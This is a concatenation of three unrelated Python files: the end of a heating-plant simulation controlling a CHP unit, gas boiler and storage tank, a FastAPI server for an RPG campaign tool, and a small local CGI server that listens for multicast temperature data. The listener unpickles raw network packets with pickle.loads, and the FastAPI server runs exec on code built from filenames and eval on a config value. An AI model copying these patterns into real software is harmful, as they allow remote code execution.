wyn = True
return wyn
# end condition_heating_2
# ==================================================================
def condition_heating_3(self, t7, t21):
# turn off only the gas boiler because storage tank is partially filled
wyn = False
if(t7 > 45.0): # storage tank is partially filled
if(t21 > 45.0): # DHW is warm enough
wyn = True
return wyn
# end condition_heating_3
# ==================================================================
def ctrl_cond_heating_period(self):
# heating period starts when ambient temperature is lower than 15.0 (= self.temp_a_hp)
if(self.t30 <= self.temp_a_hp):
return True
else:
return False
# end ctrl_cond_heating_period
# ==================================================================
def ctrl_cond_dhw_warm_enough(self):
# domestic hot water is warm enough when it is warmer than 55,0 grad Celcius (= self.temp_dhw)
if(self.t21 >= self.temp_dhw):
return True
else:
return False
# end ctrl_cond_dhw_warm_enough
# ==================================================================
def ctrl_cond_storage_empty(self):
# sorage tank is empty
# - if the temperature in its highest point is lower than the temperature required by the heating system
# - if the temperature in its second highest point is lower than the threshold temperature of self.temp_warm
# in the heating period the system has to be able to provide heat for heating system
c1 = (self.t20 < self.t25) and self.ctrl_cond_heating_period()
c2 = (self.t23 < self.t25) and self.ctrl_cond_heating_period()
# at all times the system has to be able to provide hot water for dhw preparation
c3 = (self.t19 < self.temp_warm) or (self.t20 < self.temp_warm)
c4 = (self.t18 < self.temp_dhw) or (self.t19 < self.temp_dhw) or (self.t20 < self.temp_dhw)
if(c1 or c2 or c3 or c4):
return True
else:
return False
# end ctrl_cond_storage_empty
# ==================================================================
def ctrl_cond_storage_full(self):
# storage tank is full
# - when the temperature in its second lowest point is higher than threshold temperature of self.temp_warm
# - when the temperature in its third lowest point is higher than threshold temperature of self.temp_hot
if((self.t2 >= self.temp_warm) or (self.t3 >= self.temp_hot)):
return True
else:
return False
# end ctrl_cond_storage_full
# ==================================================================
def ctrl_cond_storage_almost_empty(self):
# storage tank is almost empty
# - when heating water temperature in its fourth highest point is lower than the temperature required by the heating system
c1 = (self.t17 < self.t25) and self.ctrl_cond_heating_period()
# - when heating water temperature in its fourth highest point is lower than the temperature self.temp_warm
c2 = (self.t17 < self.temp_warm)
# - when heating water temperature in its fourth highest point is lower than the temperature self.temp_dhw
c3 = (self.t17 < self.temp_dhw)
if(c1 or c2 or c3):
return True
else:
return False
# end ctrl_cond_storage_almost_empty
# ==================================================================
def ctrl_cond_storage_almost_full(self):
# storage tank is almost full
# - when heating water temperature in its fourth lowest point is higher than or equal to self.temp_hot
if(self.t4 >= self.temp_hot):
return True
else:
return False
# end ctrl_cond_storage_almost_full
# ==================================================================
def control_internal_1(self, heizkurve, kessel, chp, cvalve, t_a, actual_time, m4, heatc_conf):
# --------------------------------------------------------------
# HEATING PERIOD DETECTION
if(self.ctrl_cond_heating_period()): # heating period
heizkurve.turn_on(t_a)
else:
heizkurve.turn_off()
self.too_cold = 0
self.V_2 = heizkurve.get_volume_flow()
# ..............................................................
# mass flow
m25 = utils.rho_fluid_water(self.t24, self.p_atm, 1) * self.V_2 # mass flow in heating circuit in kg/s
#print('time = {}; type t23 = {}; type t25 = {}'.format(actual_time, type(self.t23), type(self.t25)))
#chp_stat = 0 # status of chp unit
#gb_stat = 0 # status of gas boiler
#hr_stat = 0 # status of electric heating rod in the storage tank
# --------------------------------------------------------------
# consistency check - DO NOT PRODUCE AND CONSUME ELECTRICITY AT THE SAME TIME - NO PRODUCTION FOR OWN USAGE
if(self.keep_chp_off and self.keep_chp_on): # both cannot be true at the same time
self.keep_chp_off = False
self.keep_chp_on = False
# --------------------------------------------------------------
# STATE OF THE STORAGE TANK
# ..............................................................
# state 1 = storage tank is too cold
if(self.ctrl_cond_storage_empty()):
self.tank_state = 1
self.too_cold = 1
# return temperature from the heating system - potentially to be overwritten
self.t24 = self.calc_ret_temp_when_cold(heatc_conf, self.t30, m25, self.t20)
# storage tank is empty, turn all possible heat sources on
#..................................
# TURN ON gas boiler
gb_stat = 1
#..................................
# TURN ON chp unit
chp_stat = 1
if(self.keep_chp_off): # consume electricity
hr_stat = 1
elif(self.keep_chp_on): # produce as much electricity as possible
hr_stat = 0
else:
hr_stat = 0
self.unload = False
# ..............................................................
# state 2 = storage tank is almost empty
elif(self.ctrl_cond_storage_almost_empty()):
self.tank_state = 2
# turn on additional heat source if its not already on
if(self.keep_chp_on): # produce electricity
# two first cases concern for unloading
if((chp.get_status() == 1) and (kessel.get_status() == 0)):
# CHP unit is already on, only gas heater can be turned on
#..................................
# TURN ON gas boiler
gb_stat = 1
chp_stat = 1
elif((chp.get_status() == 0) and (kessel.get_status() == 1)):
gb_stat = 1
chp_stat = 1
else: # when it's actually loading - leave everything as it is
if(chp.get_status() == 0):
chp_stat = 0
else:
chp_stat = 1
if(kessel.get_status() == 0):
gb_stat = 0
else:
gb_stat = 1
hr_stat = 0
elif(self.keep_chp_off): # consume electricity
# two first cases concern for unloading
if((chp.get_status() == 1) and (kessel.get_status() == 0)):
gb_stat = 1
chp_stat = 1
elif((chp.get_status() == 0) and (kessel.get_status() == 1)):
gb_stat = 1
if(self.ctrl_option == 1): # 1 - be conservative and do not allow the tank to unload completely ==> no risk of not reaching room temperature
chp_stat = 1
elif(self.ctrl_option == 2): # 2 - allow the storage tank to become fully unloaded ==> risk of not reaching the room temperature
chp_stat = 0
else: # when it's actually loading - leave everything as it is
if(chp.get_status() == 0):
chp_stat = 0
else:
chp_stat = 1
if(kessel.get_status() == 0):
gb_stat = 0
else:
gb_stat = 1
hr_stat = 1
else: # no schedule interference - use only chp unit and gas boiler
# two first cases concern for unloading
if((chp.get_status() == 1) and (kessel.get_status() == 0)):
gb_stat = 1
chp_stat = 1
elif((chp.get_status() == 0) and (kessel.get_status() == 1)):
chp_stat = 1
gb_stat = 1
else: # when it's actually loading - leave everything as it is
if(chp.get_status() == 0):
chp_stat = 0
else:
chp_stat = 1
if(kessel.get_status() == 0):
gb_stat = 0
else:
gb_stat = 1
hr_stat = 0
self.unload = False
# ..............................................................
# state 3 = storage tank is almost full
elif(self.ctrl_cond_storage_almost_full()):
self.tank_state = 4
# keep only one of the heat sources on depending on their actual status and constraints of the schedule
if(self.unload): # leave everything as it is
if(chp.get_status() == 0):
chp_stat = 0
else:
chp_stat = 1
if(kessel.get_status() == 0):
gb_stat = 0
else:
gb_stat = 1
else:
if(self.keep_chp_on): # produce electricity
chp_stat = 1
gb_stat = 0
hr_stat = 0
elif(self.keep_chp_off): # consume electricity
chp_stat = 0
gb_stat = 0
hr_stat = 1
else: # no schedule interference - use only chp unit and gas boiler
chp_stat = 1
gb_stat = 0
hr_stat = 0
# ..............................................................
# state 4 = storage tank is full
elif(self.ctrl_cond_storage_full()):
self.tank_state = 5
# tank is full, turn off all possible heat sources
chp_stat = 0
gb_stat = 0
hr_stat = 0
hr_stat = 0
self.unload = True
# ..............................................................
# state 5 = storage tank is being loaded/unloaded and the border of high and low temperatures is somewhere in the middle
else:
self.tank_state = 3
if(self.keep_chp_on): # produce electricity
if(chp.get_status() == 0): # turn it on
chp_stat = 1
else:
chp_stat = 1
if(kessel.get_status() == 1): # keep it as it is
gb_stat = 1
else:
gb_stat = 0
if(self.rod_stat > 0.0): # turn it off
hr_stat = 0
else:
hr_stat = 0
elif(self.keep_chp_off): # consume electricity
if(chp.get_status() == 0): # turn it off
chp_stat = 0
else:
chp_stat = 0
if(kessel.get_status() == 1): # keep it as it is
gb_stat = 1
else:
gb_stat = 0
if(self.rod_stat > 0.0): # turn it on
hr_stat = 1
else:
hr_stat = 1
else: # no schedule interference - use only chp unit and gas boiler
if(chp.get_status() == 0): # keep it as it is
chp_stat = 0
else:
chp_stat = 1
if(kessel.get_status() == 1): # keep it as it is
gb_stat = 1
else:
gb_stat = 0
if(self.rod_stat > 0.0): # turn it off
hr_stat = 0
else:
hr_stat = 0
# --------------------------------------------------------------
# DOMESTIC HOT WATER PREPARATION
# domestic hot water priority
if(not self.ctrl_cond_dhw_warm_enough()):
self.dhw_prod = 1
# temperature of dhw has to be kept at all times regardless of the state of storage tank and occurence of heating period
if(self.keep_chp_off): # use up electricity
if((kessel.get_status() == 0) or (gb_stat == 0)):
gb_stat = 1 # turn on gas boiler if it is off
if((self.rod_stat == 0) or (self.rod_stat < 1.0) or (hr_stat == 0) or (hr_stat < 1.0)):
hr_stat = 1 # turn on electric heater if it is off and gas boiler is not enough to heat up the dhw
else:
chp_stat = 1 # turn on chp unit if other measures do not suffice
elif(self.keep_chp_on): # produce electricity
if((chp.get_status() == 0) or (chp_stat == 0)):
chp_stat = 1 # turn on chp unit if it is off
if((kessel.get_status() == 0) or (gb_stat == 0)):
gb_stat = 1 # turn on gas boiler if it is off
else:
hr_stat = 1 # turn on electric heater if it is off and other sources are not up to the task
else: # no schedule interference - use only chp unit and gas boiler
if((chp.get_status() == 0) or (chp_stat == 0)):
chp_stat = 1 # turn on chp unit if it is off
if((kessel.get_status() == 0) or (gb_stat == 0)):
gb_stat = 1 # turn on gas boiler if it is off
else:
self.dhw_prod = 0
#print('chp = {}, bg = {}, hr = {}'.format(chp.get_status(), kessel.get_status(), self.rod_stat))
# --------------------------------------------------------------
# APPLY THE SETTINGS
# chp unit
if(chp_stat == 0):
wyn = chp.turn_off(actual_time)
elif(chp_stat == 1):
if(chp.get_status() == 0):
#..................................
# TURN ON chp unit
wyn = chp.turn_on(actual_time, self.t27) # turn the chp unit on
if (wyn[0] == False):
#H.write('Could not turn CHP unit on at time = {}. Time left to the next turn on = {} s. t23 < t25\n'.format(actual_time,wyn[4].seconds))
if(self.dbg != 3):
print('Could not turn CHP unit on at time = {}. Time left to the next turn on = {} s. t23 < t25'.format(actual_time,wyn[4].seconds))
else:
wyn = chp.get_chp()
#print('TOO COLD, chp is off, t26 = {}; wyn[2] = {}; stat chp = {}; stat boiler = {}'.format(self.t26,wyn[2],chp.get_status(),kessel.get_status()))
#print('chp.get_stat = {}; wyn = {}'.format(chp.get_status(), wyn))
self.t26 = wyn[2]
#self.t27 = wyn[1]
chp.set_inp_temp(self.t27) # temperature incoming from tank to chp
m3 = wyn[3]
self.V_3 = m3 / utils.rho_fluid_water(self.t26, self.p_atm, 1) # in m3/s = kg/s / kg/m3
# gas boiler
if(gb_stat == 0):
wyn = kessel.turn_off(actual_time)
elif(gb_stat == 1):
if(kessel.get_status() == 0):
#..................................
# TURN ON gas boiler
wyn = kessel.turn_on(actual_time) # turn the gas boiler on
if (wyn[0] == False):
#H.write('Could not turn gas boiler on at time = {}. Time left to the next turn on = {} s. t23 < t25\n'.format(actual_time,wyn[4].seconds))
if(self.dbg != 3):
print('Could not turn gas boiler on at time = {}. Time left to the next turn on = {} s. t23 < t25'.format(actual_time,wyn[4].seconds))
else:
wyn = kessel.get_kessel()
#print('t28 = {}; wyn[2] = {}'.format(self.t28,wyn[2]))
self.t28 = wyn[2]
#self.t29 = wyn[1]
kessel.set_inp_temp(self.t29)
m4 = wyn[3]
self.V_4 = m4 / utils.rho_fluid_water(self.t29, self.p_atm, 1) # in m3/s = kg/s / kg/m3
# heating rod in the storage tank
if(hr_stat == 0):
self.rod_stat = 0.0
elif(hr_stat == 1):
self.rod_stat = 1.0
else:
self.rod_stat = hr_stat
# --------------------------------------------------------------
# CALCULATE THE OUTPUTS: return (m23, m25, m4)
cp25 = utils.cp_fluid_water(self.t25, self.p_atm, 1)
cp24 = utils.cp_fluid_water(self.t24, self.p_atm, 1)
cp23 = utils.cp_fluid_water(self.t23, self.p_atm, 1)
if((self.t23 * cp23 - self.t24 * cp24) != 0.0):
# m23 + m_bypass = m25 ==> m_bypass = m25 - m23
# t23 * cp23 * m23 + t24 * cp24 * m_bypass = t25 * cp25 * m25
# t23 * cp23 * m23 + t24 * cp24 * (m25 - m23) = t25 * cp25 * m25
# m23 * (t23 * cp23 - t24 * cp24) = m25 * (t25 * cp25 - t24 * cp24)
m23 = m25 * (self.t25 * cp25 - self.t24 * cp24) / (self.t23 * cp23 - self.t24 * cp24)
else:
m23 = 0.0
if(m25 != 0.0):
cvalve.set_hub(m23 / m25)
# t25 = (t23 * cp23 + m_bypass * cp24) / (m25 * cp24)
else:
m23 = 0.0
cvalve.set_hub(0.0)
return (m23, m25, m4)
#end control_internal_1
# ==================================================================
def control_internal_2(self, chp, kessel, actual_time, m4):
# controls - turn all off when the tank is fully loaded
#if(str(type(self.t2))!="<class 'float'>"):
#print('actual_time = {}; t2 = {}; t3 = {}'.format(actual_time, self.t2, self.t3))
#if((self.t2 > 45.0) or (self.t3 > 60.0)):
if(self.condition_heating_2(self.t2, self.t3, self.t21)): # storage tank is loaded up - heat sources can be turned off
if(chp.get_status() == 1): # turn off CHP unit only if it is on in the first place
if((not self.keep_chp_on) or (self.keep_chp_on and kessel.get_status() == 0)): # only when it's ok or the gas boiler is already off
wyn = chp.turn_off(actual_time)
self.t26 = wyn[2]
self.t27 = wyn[1]
m3 = wyn[3]
self.V_3 = m3 / utils.rho_fluid_water(self.t26, self.p_atm, 1) # in m3/s = kg/s / kg/m3
if(kessel.get_status() == 1):
wyn = kessel.turn_off(actual_time)
self.t28 = wyn[2]
self.t29 = wyn[1]
m4 = wyn[3]
self.V_4 = m4 / utils.rho_fluid_water(self.t28, self.p_atm, 1) # in m3/s = kg/s / kg/m3
#print('t2>45||t3>60, turn OFF, chp = {}, kessel = {}'.format(chp.get_status(),kessel.get_status()))
# controls - turn the gas heater off when the tank is more than half loaded
#if(self.t7 > 45.0):
if(self.condition_heating_3(self.t7, self.t21)): # storage tank is partially filled, so that some heat sources can be turned off
if(kessel.get_status() == 1):
wyn = kessel.turn_off(actual_time)
self.t28 = wyn[2]
self.t29 = wyn[1]
m4 = wyn[3]
self.V_4 = m4 / utils.rho_fluid_water(self.t28, self.p_atm, 1) # in m3/s = kg/s / kg/m3
#print('t7>45, turn OFF, chp = {}, kessel = {}'.format(chp.get_status(),kessel.get_status()))
# ..............................................................
#
#
# storage tank
#tank.calc_dhw_heat_exchange(time_step_in_s, t_in_dw , t_out_dw, mstr_dhw)
# controls - turn on the chp unit and heater if the temperature of domestic hot water is too low
if self.t21 < 45.0:
# CHP unit is running already, or it should run as late as possible due to the demands of the schedule
if ((chp.get_status()) or (self.keep_chp_off)):
wyn = kessel.turn_on(actual_time)
if (wyn[0] == False):
#H.write('Could not turn gas boiler on at time = {}. Time left to the next turn on = {} s. t21 < 45\n'.format(actual_time,wyn[4].seconds))
if(self.dbg != 3):
print('Could not turn gas boiler on at time = {}. Time left to the next turn on = {} s. t21 < 45'.format(actual_time,wyn[4].seconds))
self.t28 = wyn[2]
self.t29 = wyn[1]
m4 = wyn[3]
self.V_4 = m4 / utils.rho_fluid_water(self.t29, self.p_atm, 1) # in m3/s = kg/s / kg/m3
#elif((self.keep_chp_off and (kessel.get_status())) or ()): #
else:
wyn = chp.turn_on(actual_time, self.t27)
self.t26 = wyn[2]
self.t27 = wyn[1]
m3 = wyn[3]
if (wyn[0] == False):
#H.write('Could not turn CHP on at time = {}. Time left to the next turn on = {} s. t21 < 45\n'.format(actual_time,wyn[4].seconds))
if(self.dbg != 3):
print('Could not turn CHP on at time = {}. Time left to the next turn on = {} s. t21 < 45'.format(actual_time,wyn[4].seconds))
self.V_3 = m3 / utils.rho_fluid_water(self.t26, self.p_atm, 1) # in m3/s = kg/s / kg/m3
#print('t21<45, turn ON, chp = {}, kessel = {}'.format(chp.get_status(),kessel.get_status()))
elif self.t21 > 85.0:
if(self.dbg != 3):
print('alarm dhw too hot t = {}'.format(self.t21))
#if(self.t21 > 85.0):
#quit()
#print('cond heat on = {}; cond 2 heat on = {}; cond 1 OFF = {}; cond 2 OFF = {}'.format(self.t23 < self.t25, self.t21 < 45.0, ((self.t2 > 45.0) or (self.t3 > 60.0)), self.t7 > 45.0))
# ..............................................................
#end control_internal_2
# ==================================================================
def calc_ret_temp_when_cold(self, heatc_conf, t_a, mstr, t_in):
# returns the approximated return temperature from the heating system when the input temprature is too low to provide ehough energy to cover the heating load
t_in_N = heatc_conf['design_supply_temperature_oC']
t_out_N = heatc_conf['design_return_temperature_oC']
t_i_N = heatc_conf['design_indoor_temperature_oC']
t_a_N = heatc_conf['design_ambient_temperature_oC']
mcp = utils.cp_fluid_water(t_in, utils.get_pressure_in_MPa(), utils.get_calc_option())
Ak = mstr * mcp * (t_in_N - t_out_N) / (0.5 * (t_in_N + t_out_N) - t_i_N)
AWkW = mstr * mcp * (t_in_N - t_out_N) / (t_i_N - t_a_N)
A1 = Ak / (AWkW + Ak)
A2 = mstr * mcp / Ak
A3 = AWkW / (AWkW + Ak)
B1 = (0.5 * A1 - 0.5 - A2) / (0.5 - 0.5 * A1 - A2)
B2 = A3 / (0.5 - 0.5 * A1 - A2)
return (t_in * B1 + t_a * B2)
# end calc_ret_temp_when_cold
# ==================================================================
def one_iteration_step(self, tsm, tank, chp, kessel, cvalve, heizkurve, t_a, el_heat_status, actual_time, heatc_conf):
""" one iteration step of the whole RVK system """
#print('\n chp = {}; kessel = {}; t2 = {}; t3 = {}'.format(chp.get_status(), kessel.get_status(), self.t2, self.t3))
# combined heat and power unit - link outputs
wyn = chp.get_chp()
#self.t27 = wyn[1] # tin in °C = self.t1 = wyn[t1]
self.t26 = wyn[2] # tout in °C = chp.get_out_temp = wyn[2]
m3 = wyn[3] # mstr in kg/s
self.V_3 = m3 / utils.rho_fluid_water(self.t26, self.p_atm, 1) # volume flow incoming to chp from tank
V_chp = chp.get_volume_flow_at_output() # volume flow outoming from chp into tank
# combined heat and power unit - link inputs
chp.set_inp_temp(self.t27) # temperature incoming from tank to chp
# ..............................................................
# gas boiler - link outputs
wyn = kessel.get_kessel()
#self.t29 = wyn[1] # tin in °C - incoming into gas heater
self.t28 = wyn[2] # tout in °C - outcoming from gas heater
m4 = wyn[3] # mstr in kg/s - incoming into gas heater
self.V_4 = kessel.get_volume_flow_at_input()
V_kessel = kessel.get_volume_flow_at_output()
# gas boiler - link inputs
kessel.set_inp_temp(self.t29)
#kessel.calc_mass_flow()
# ..............................................................
# at first no delay - just linking chp and heater
# delay due to the seuence of commands ie equal to the Timestep length
self.t27 = self.t1
self.t29 = self.t1
# ..............................................................
# heating circuit
self.t23 = self.t20 # no delay assumed
#print('t20 = {}; t23 = {}'.format(self.t20, self.t23))
self.t25 = heizkurve.get_supply_temperature(t_a)
self.t24 = heizkurve.get_return_temperature(t_a)
heizkurve.calc_volume_flow()
# comprehensive control algorithm - it stays
(m23, m25, m4) = self.control_internal_1(heizkurve, kessel, chp, cvalve, t_a, actual_time, m4, heatc_conf)
m_bypass = m25 - m23
rho23 = utils.rho_fluid_water(self.t23, self.p_atm, 1)
V_23 = m23 / rho23 # in m3/s = kg/s / kg/m3
#print('V_23 = {}; m23 = {}; rho23 = {}; t23 = {}'.format(V_23,m23, rho23, self.t23))
m24 = m23
rho24 = utils.rho_fluid_water(self.t24, self.p_atm, 1)
V_24 = m24 / rho24
# demand for domestic hot water
m22 = self.V_1 * utils.rho_fluid_water(self.t22, self.p_atm, 1) # in kg/s = m3/s * kg/m3
#m22 = 0.01 # kg/s
# ..............................................................
t_ambient = 15.0
# storage tank - calculation
tank.calculate_storage_tank_obj(tsm, # time step manager
self.t23, # hk_inp_temp
V_23, # hk_inp_volfl_m3s
self.t24, # hk_out_temp
self.t27, # chp_inp_temp
self.t26, # chp_out_temp
self.V_3, # chp_inp_volfl_m3s
self.t29, # gb_inp_temp
self.t28, # gp_out_temp
self.V_4, # gb_inp_volfl_m3s
self.t22, # dhw_inp_temp
self.t21, # dhw_out_temp
self.V_1, # dhw_inp_volfl_m3s
el_heat_status, # el_heat_status
actual_time, # time in the timestamp format
t_ambient) # ambient temperature of the tank - defines heat losses to the outside
self.t21 = tank.get_temp_dhw()
#self.t27 =
#self.t29 =
#self.t23 =
# storage tank - linking
[self.t1, self.t2, self.t3, self.t4, self.t5, self.t6, self.t7, self.t8, self.t9, self.t10,
self.t11, self.t12, self.t13, self.t14, self.t15, self.t16, self.t17, self.t18, self.t19, self.t20] = tank.output_temperatures()
# ..............................................................
# get rid of this part
#self.control_internal_2(chp, kessel, actual_time, m4)
# ..............................................................
heizwert_in_MJ_per_kg = 50.0 # kg/m3 N ~CH4
gas_density = 0.79 # kg/m3 N ~Erdgas
Z_boiler = kessel.get_gas_mstr(heizwert_in_MJ_per_kg) / gas_density
self.Z_2 = chp.get_gas_mstr(heizwert_in_MJ_per_kg) / gas_density
self.Z_1 = self.Z_2 + Z_boiler
self.Wh1 = -1.0 * chp.get_el_prod()
self.Wh2 = tank.get_el_heater_consumption()
self.Wh3 = self.Wh1 + self.Wh2 + self.electricity_consumption_kWh
#print('END chp = {}; kessel = {}; heating = {}; t2 = {}; t3 = {};V1 = {}; V2 = {}; V3 = {}; V4 = {}; t_a = {}'.format(chp.get_status(), kessel.get_status(), heizkurve.get_status(), self.t2, self.t3, self.V_1, self.V_2, self.V_3, self.V_4, t_a))
#end one_iteration_step
|
main.py
|
from _runtime import server, CONFIG
from fastapi import FastAPI, Request, Body, Response, status
from fastapi.responses import HTMLResponse, StreamingResponse, FileResponse
from fastapi_utils.tasks import repeat_every
import uvicorn
import rsa
import os
import sys
import hashlib
from pydantic import BaseModel, create_model
from typing import Optional
from util import *
from classes import *
import urllib
import logging
import base64
import json
import random
import time
import pickle
from endpoints import server_endpoint, client_endpoint, compendium_endpoint, character_endpoint, campaign_endpoint, image_endpoint, player_endpoint
from _api import *
from threading import Thread
from markdown2 import Markdown
# Configs
VERSION = 0
logger = logging.getLogger("uvicorn.error")
'''if os.path.exists('prikey.pem') and os.path.exists('pubkey.pem'):
try:
logger.info('Loading RSA keys from PEM files.')
with open('pubkey.pem','rb') as pub:
PUBLIC_KEY = rsa.PublicKey.load_pkcs1(pub.read())
with open('prikey.pem','rb') as pri:
PRIVATE_KEY = rsa.PrivateKey.load_pkcs1(pri.read())
except:
logger.warning('Error loading old keys. Generating new ones.')
PUBLIC_KEY, PRIVATE_KEY = rsa.newkeys(1024,accurate=True)
with open('pubkey.pem','wb') as pub:
pub.write(PUBLIC_KEY.save_pkcs1())
with open('prikey.pem','wb') as pri:
pri.write(PRIVATE_KEY.save_pkcs1())
else:
logger.info('Generating new RSA keys.')
PUBLIC_KEY, PRIVATE_KEY = rsa.newkeys(1024,accurate=True)
with open('pubkey.pem','wb') as pub:
pub.write(PUBLIC_KEY.save_pkcs1())
with open('prikey.pem','wb') as pri:
pri.write(PRIVATE_KEY.save_pkcs1())'''
def ep_reload(endpoint):
try:
data = get5e_direct(endpoint)
with open(os.path.join('database','cached','open5e',endpoint+'.json'),'w') as f:
json.dump(data,f)
#logger.info('Reloaded '+endpoint)
except:
logger.warning('Open5e Endpoint '+endpoint+' is not accessible.')
def reload_open5e_cache(endpoints=['spells','monsters','sections','magicitems']):
threads = []
for endpoint in endpoints:
ep_reload(endpoint)
return threads
# Setup
'''Build database'''
folders = ['users','sessions','campaigns','characters','cached',os.path.join('cached','open5e'),'images']
for f in folders:
try:
os.makedirs(os.path.join('database',f))
with open(os.path.join('database',f,'registry.json'),'w') as reg:
reg.write('{}')
except FileExistsError:
pass
'''reload_open5e_cache()
with open(os.path.join('database','cached','open5e','last_update.ini'),'w') as f:
f.write(str(int(time.time())))
logger.info('Reloaded Open5e Cache.')'''
'''Get OpenAPI configs'''
with open(os.path.join('config','openapi.json'),'r') as c:
openapicfg = json.load(c)
tags_meta = openapicfg['metadata']
# App
# Instantiate server instance - todo add stateful cache
app = FastAPI(openapi_tags=tags_meta)
# Routers
app.include_router(
server_endpoint.router,
prefix='/server',
tags=['server']
)
app.include_router(
client_endpoint.router,
prefix='/client/{fingerprint}',
tags=['client']
)
app.include_router(
compendium_endpoint.router,
prefix='/compendium',
tags=['compendium']
)
app.include_router(
character_endpoint.router,
prefix='/characters/{fingerprint}',
tags=['characters']
)
app.include_router(
campaign_endpoint.router,
prefix='/campaigns/{fingerprint}',
tags=['campaigns']
)
app.include_router(
image_endpoint.router,
prefix='/images',
tags=['images']
)
app.include_router(
player_endpoint.router,
prefix='/campaigns/{fingerprint}/player/{campaign}/{map}',
tags=['player']
)
@app.get('/', response_class=HTMLResponse, include_in_schema=False) # Get index.html when navigated to root
async def groot():
with open(os.path.join('client','index.html'),'r') as f:
return f.read()
@app.get('/characters', response_class=HTMLResponse, include_in_schema=False)
async def gchars():
with open(os.path.join('client','characters.html'),'r') as f:
return f.read()
@app.get('/campaigns', response_class=HTMLResponse, include_in_schema=False)
async def gcamps():
with open(os.path.join('client','campaigns.html'),'r') as f:
return f.read()
@app.get('/help', response_class=HTMLResponse, include_in_schema=False)
async def ghelp():
with open(os.path.join('client','help.html'),'r') as f:
return f.read()
@app.get('/player', response_class=HTMLResponse, include_in_schema=False)
async def ghelp():
with open(os.path.join('client','player.html'),'r') as f:
return f.read()
# Load web server
files = list(os.walk('client'))
slashtype = '/'
aux = '/'
if sys.platform == 'win32':
slashtype = '\\'
aux = '\\\\'
web_paths = []
for f in files:
split_path = f[0].split(slashtype)
if len(split_path) > 1:
new_path = '/'.join(split_path[1:])+'/'
else:
new_path = ''
dirpath = aux.join(f[0].split(slashtype))
for fn in f[2]:
ext = os.path.splitext(fn)[1]
code = '\n'.join([
'@app.get("/'+new_path+fn+'", include_in_schema=False)',
'async def web_'+fn.replace('.','_').replace('-','_').replace(' ','_').replace('\'','').replace('"','')+'():',
'\treturn FileResponse("'+dirpath+aux+fn+'")'
])
web_paths.append(new_path+fn)
exec(
code,
globals(),
locals()
)
logger.info(f'Loaded {len(web_paths)} static files.')
@app.get('/static/')
async def get_static_file_paths():
global web_paths
return web_paths
def fix():
for _f in [os.path.join('database','campaigns',i) for i in os.listdir(os.path.join('database','campaigns')) if i.endswith('.pkl')]:
with open(_f,'rb') as f:
obj = pickle.load(f)
for m in obj.maps.keys():
if not 'chat' in obj.maps[m].keys():
obj.maps[m]['chat'] = []
nchat = []
if (not eval(CONFIG['RUNTIME']['clear_chat'])):
for c in obj.maps[m]['chat']:
if type(c) == dict:
nchat.append(c)
obj.maps[m]['chat'] = nchat[:]
if not 'initiative' in obj.maps[m].keys():
obj.maps[m]['initiative'] = {
'running':False,
'order':{},
'current':None,
'started':False
}
load_user(obj.owner)
if not obj.id in server.users[obj.owner].owned_campaigns:
server.users[obj.owner].owned_campaigns.append(obj.id)
cache_user(obj.owner)
with open(_f,'wb') as f:
pickle.dump(obj,f)
# Start tasks
@app.on_event('startup')
async def load_users():
reg = get_user_registry()
for u in reg.keys():
if os.path.exists(os.path.join('database','users',u+'.pkl')):
server.users[u] = os.path.join('database','users',u+'.pkl')
fix()
# Load periodic functions
@app.on_event('startup') # Run on startup
@repeat_every(seconds=5) # Run on startup
async def check_connections_task(): # Task to check whether connections have timed out
newconn = {}
oldconn = server.connections.copy() # Create copy of old connections dictionary
for conn in oldconn.keys(): # Iterate through connection IDs
if oldconn[conn].timeout >= time.time(): # If not timed out
newconn[conn] = oldconn[conn] # Add to new dict
else:
logger.info('Timed out connection '+conn)
cache_user(server.connections[conn].uid) # Cache the user object to a pickle file
server.connections = newconn.copy() # Replace the old connections dictionary with the new one
@app.on_event('startup') # Run on startup
@repeat_every(seconds=120) # Run every 2 minutes
async def reload_cached():
if not os.path.exists(os.path.join('database','cached','open5e','last_update.ini')):
with open(os.path.join('database','cached','open5e','last_update.ini'),'w') as f:
f.write(str(int(time.time())))
t = Thread(target=reload_open5e_cache)
t.start()
else:
with open(os.path.join('database','cached','open5e','last_update.ini'),'r') as f:
dat = f.read()
if dat == '':
dat = 0
if int(dat)+600 < time.time() or dat == '':
t = Thread(target=reload_open5e_cache)
t.start()
with open(os.path.join('database','cached','open5e','last_update.ini'),'w') as f:
f.write(str(int(time.time())))
if __name__ == "__main__":
uvicorn.run('main:app', host=CONFIG['RUNTIME']['server_ip'], port=int(CONFIG['RUNTIME']['server_port']), log_level="info", access_log=False)
|
selfserve.py
|
#!/usr/bin/python
# Self Server
import sys
import time
import os
import pickle
import BaseHTTPServer
import CGIHTTPServer
import SocketServer
import BaseHTTPServer
import SimpleHTTPServer
import socket
import struct
import threading
class mcastThread:
def __del__(self):
try:
self.sock.setsockopt(socket.SOL_IP, socket.IP_DROP_MEMBERSHIP, socket.inet_aton(self.MCAST_GRP) + socket.inet_aton('0.0.0.0'))
except:
pass
def __init__(self):
self.MCAST_GRP = '239.232.168.250'
self.MCAST_PORT = 5087
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self.sock.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, 20)
self.sock.bind(('', self.MCAST_PORT))
mreq = struct.pack("4sl", socket.inet_aton(self.MCAST_GRP), socket.INADDR_ANY)
self.sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def monitorTemp(self):
while 1:
try:
data, addr = self.sock.recvfrom(1059)
d=pickle.loads(data)
o=open("/tmp/tempresult","w")
o.write(data)
o.close()
for x in d['currentResult']:
sys.stdout.write("%s %s %.4f\t" %(x,d['currentResult'][x]['valid'],d['currentResult'][x]['temperature']))
for c in range(3-len(d['currentResult'])):
sys.stdout.write("--------------- ----- -----\t")
sys.stdout.write("\n")
sys.stdout.flush()
except:
pass
time.sleep(0.75)
print """
=========================================================
Launching Local Server:
To access use: http://localhost:54661/
=========================================================
"""
if not os.path.exists("index.html"):
o=open("index.html","w")
o.write("""
<Script Langauge="Javascript">
window.location.replace("metroui/index.py");
</script>
""")
o.close()
class ThreadingSimpleServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
pass
if __name__ == '__main__':
mcastThread=mcastThread()
mcastTempMonitorThread = threading.Thread(target=mcastThread.monitorTemp)
mcastTempMonitorThread.daemon=True
mcastTempMonitorThread.start()
handler = CGIHTTPServer.CGIHTTPRequestHandler
server = ThreadingSimpleServer(('', 54661), handler)
handler.cgi_directories = ["/metroui"]
try:
while 1:
